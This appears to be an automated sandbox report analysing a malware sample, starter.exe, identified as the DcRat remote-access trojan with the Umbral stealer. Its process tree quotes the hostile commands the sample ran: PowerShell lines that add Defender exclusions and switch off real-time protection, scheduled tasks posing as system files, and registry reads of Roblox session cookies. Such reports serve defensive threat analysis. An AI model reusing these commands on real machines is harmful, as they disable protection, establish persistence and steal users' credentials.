Analysis

  • max time kernel
    25s
  • max time network
    31s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23-01-2025 07:47

General

  • Target

    starter.exe

  • Size

    2.7MB

  • MD5

    a2c7f33b3aaf2b9c8c83a6fc8f3557d3

  • SHA1

    2e221f4302dab0406047730b6a00f41ba50026f1

  • SHA256

    dac550df5cc55821ef50537529790217fce473b75d590c5574e4f591faf58e4d

  • SHA512

    0b87aaac5ce731af9626cbc1cb6b57c6c88639c369e6a1b1fbe837cb39492e0d8c62c0413089b505cbbf7682e70291424b845965dbe7152d718f096bb784445c

  • SSDEEP

    49152:BaxMakFibE1xjiFzt/BcB91FpttORQCs1tMfxkmXVamXT:oMiI1tYztSBH/Na5kmXVhT

Malware Config

Signatures

  • DcRat 12 IoCs

    DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Detect Umbral payload 2 IoCs
  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 3 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Umbral family
  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 8 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\starter.exe
    "C:\Users\Admin\AppData\Local\Temp\starter.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:3832
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4076
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:3020
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:2108
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:3636
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:3852
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:652
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:316
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:4516
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:3428
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
      2⤵
      • DcRat
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:372
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "Nursultan" /SC ONLOGON /TR "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe" /RL HIGHEST
      2⤵
      • DcRat
      • Scheduled Task/Job: Scheduled Task
      PID:1344
    • C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
      "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
      2⤵
      • DcRat
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3972
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Windows\System32\IQz552wvknf.vbe"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2684
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\ihzs31tQ9biU.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4080
          • C:\Windows\SysWOW64\RuntimeBroker.exe
            "C:\Windows\System32\RuntimeBroker.exe"
            5⤵
            • UAC bypass
            • Checks computer location settings
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • System policy modification
            PID:696
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\RuntimeBroker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4860
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\dotnet\unsecapp.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1156
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\csrss.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2432
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\suxlltqCa3.bat"
              6⤵
              PID:3436
              • C:\Windows\System32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                PID:3356
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svhost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2816
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "svhost" /SC ONLOGON /TR "C:\Users\Admin\AppData\Local\Temp\svhost.exe" /RL HIGHEST
      2⤵
      • DcRat
      • Scheduled Task/Job: Scheduled Task
      PID:5056
    • C:\Users\Admin\AppData\Local\Temp\svhost.exe
      "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3644
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2888
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        3⤵
        • Views/modifies file attributes
        PID:4712
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svhost.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2944
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2016
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4644
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4444
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1840
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        PID:5012
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        PID:2004
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:4616
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • Detects videocard installed
        PID:956
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\svhost.exe" && pause
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4204
        • C:\Windows\system32\PING.EXE
          ping localhost
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1892
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Program Files\dotnet\unsecapp.exe'" /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:8
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files\dotnet\unsecapp.exe'" /rl HIGHEST /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:536
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Program Files\dotnet\unsecapp.exe'" /rl HIGHEST /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:5008
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Photo Viewer\csrss.exe'" /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:700
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\csrss.exe'" /rl HIGHEST /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2240
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\csrss.exe'" /rl HIGHEST /f
    1⤵
    • DcRat
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2052

Network

MITRE ATT&CK Enterprise v15


Downloads

          • C:\Program Files\dotnet\unsecapp.exe

            Filesize

            1.3MB


          • C:\ProgramData\start.bat

            Filesize

            560B


          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB


          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            948B


          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB


          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB


          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            64B


          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B


          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B


          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B


          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B


          • C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

            Filesize

            1.6MB


          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vi3gtexv.dhj.ps1

            Filesize

            60B


          • C:\Users\Admin\AppData\Local\Temp\null

            Filesize

            56B


          • C:\Users\Admin\AppData\Local\Temp\suxlltqCa3.bat

            Filesize

            201B


          • C:\Users\Admin\AppData\Local\Temp\svhost.exe

            Filesize

            229KB


          • C:\Windows\SysWOW64\IQz552wvknf.vbe

            Filesize

            206B


          • C:\Windows\SysWOW64\RuntimeBroker.exe

            Filesize

            1.3MB


          • C:\Windows\SysWOW64\ihzs31tQ9biU.bat

            Filesize

            39B

